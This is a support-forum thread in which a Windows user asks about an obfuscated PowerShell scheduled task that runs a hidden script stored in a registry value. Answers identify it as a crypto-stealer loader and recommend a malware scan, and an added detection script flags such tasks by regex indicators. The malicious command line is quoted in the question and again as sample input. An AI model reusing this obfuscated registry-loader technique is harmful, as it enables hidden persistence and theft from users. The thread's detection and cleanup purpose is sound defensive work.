Unknown PowerShell script running

Anonymous
2023-02-25T19:09:54+00:00

Hi,

I usually get a brief pop-up for a script that runs at random times (as far as I can gather). It's only for a split second, but it's a nuisance if I am gaming, as my controller is just disabled until I swap out and back to the game window again.

I can see that there are several PowerShell scripts that execute from the Task Scheduler, but I am much more concerned about the below script that runs:

C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe -WINDOwstYLe hIDDen -COmmaNd "IcM ([scrIpTBLOck]::CrEatE([sTRInG]::joiN('', ((Get-iTempRopERtY -pATH 'Hklm:\SoFTwAre\asiOscCSU').'SCCsu95' | % { chAR }))))"

I have disabled all these PowerShell scripts, but deleted the above from the Task Scheduler. Is the above a legitimate Windows process? Also, I tried to find the registry key it is referring to but I cannot locate it.

Windows for home | Windows 11 | Security and privacy

Locked Question. This question was migrated from the Microsoft Support Community.

Answer accepted by question author

_AW_ 67,926 Reputation points Volunteer Moderator
2023-02-25T22:48:10+00:00

That command runs a script stored in the registry that, in all the ones I've looked at, tries to download a crypto stealer. AFAIK the domains are dead, so nothing is downloaded.

Run a Malwarebytes scan to be sure there's nothing lurking.

https://www.malwarebytes.com/mwb-download

1 person found this answer helpful.
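
The following is an added example, not part of the question or either answer: a PowerShell audit that lists scheduled tasks whose action matches the traits of the command quoted in the question (hidden window, script block built from a registry value) and reports whether the referenced key still exists. The function names and the two-indicator threshold are assumptions made for illustration.

```powershell
# Indicators drawn from the command line quoted in the question.
# -match is case-insensitive, so mixed-case spelling does not evade it.
$Indicators = [ordered]@{
    HiddenWindow      = '-w\w*\s+hidden'
    ScriptBlockCreate = '\[scriptblock\]::create'
    RegistryRead      = 'Get-ItemProperty|HK(LM|CU):'
    InvokeCommand     = '\b(icm|Invoke-Command|iex|Invoke-Expression)\b'
}

# Hypothetical helper: names of the indicators present in one command line.
function Get-CommandLineIndicator {
    param([string]$CommandLine)
    foreach ($name in $Indicators.Keys) {
        if ($CommandLine -match $Indicators[$name]) { $name }
    }
}

# Hypothetical helper: scheduled tasks that start PowerShell with 2+ indicators.
function Find-SuspiciousTask {
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # skip non-exec actions
            $cmd = "$($action.Execute) $($action.Arguments)"
            if ($cmd -notmatch 'powershell|pwsh') { continue }
            $hits = @(Get-CommandLineIndicator $cmd)
            if ($hits.Count -lt 2) { continue }      # threshold is an assumption
            # Pull out the quoted registry path, if any, and check it still exists.
            $key = if ($cmd -match "'(HK(?:LM|CU):\\[^']+)'") { $Matches[1] }
            [pscustomobject]@{
                Task        = $task.TaskPath + $task.TaskName
                State       = $task.State
                Indicators  = $hits -join ','
                RegistryKey = $key
                KeyExists   = if ($key) { Test-Path -LiteralPath $key } else { $null }
                Command     = $cmd
            }
        }
    }
}

# Sample input: the task action posted in the question, kept as an inert string.
$sample = @'
C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe -WINDOwstYLe hIDDen -COmmaNd "IcM ([scrIpTBLOck]::CrEatE([sTRInG]::joiN('', ((Get-iTempRopERtY -pATH 'Hklm:\SoFTwAre\asiOscCSU').'SCCsu95' | % { chAR }))))"
'@
Get-CommandLineIndicator $sample      # indicators found in the sample string
Find-SuspiciousTask | Format-List     # audit of the tasks on this machine
```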

1 additional answer

  1. Anonymous
    2023-02-25T20:26:36+00:00

    Hi, I'm Elise, and I'd be happy to help with your issue.

    It certainly doesn’t look legitimate; it could be leftover from an app or service you had installed, or it could be malware.

    I would certainly disable or delete any tasks such as this. I’d also recommend scanning your PC with something like Malwarebytes to see if anything is detected.

    Please let me know if you need any further assistance.

    Kind Regards,

    Elise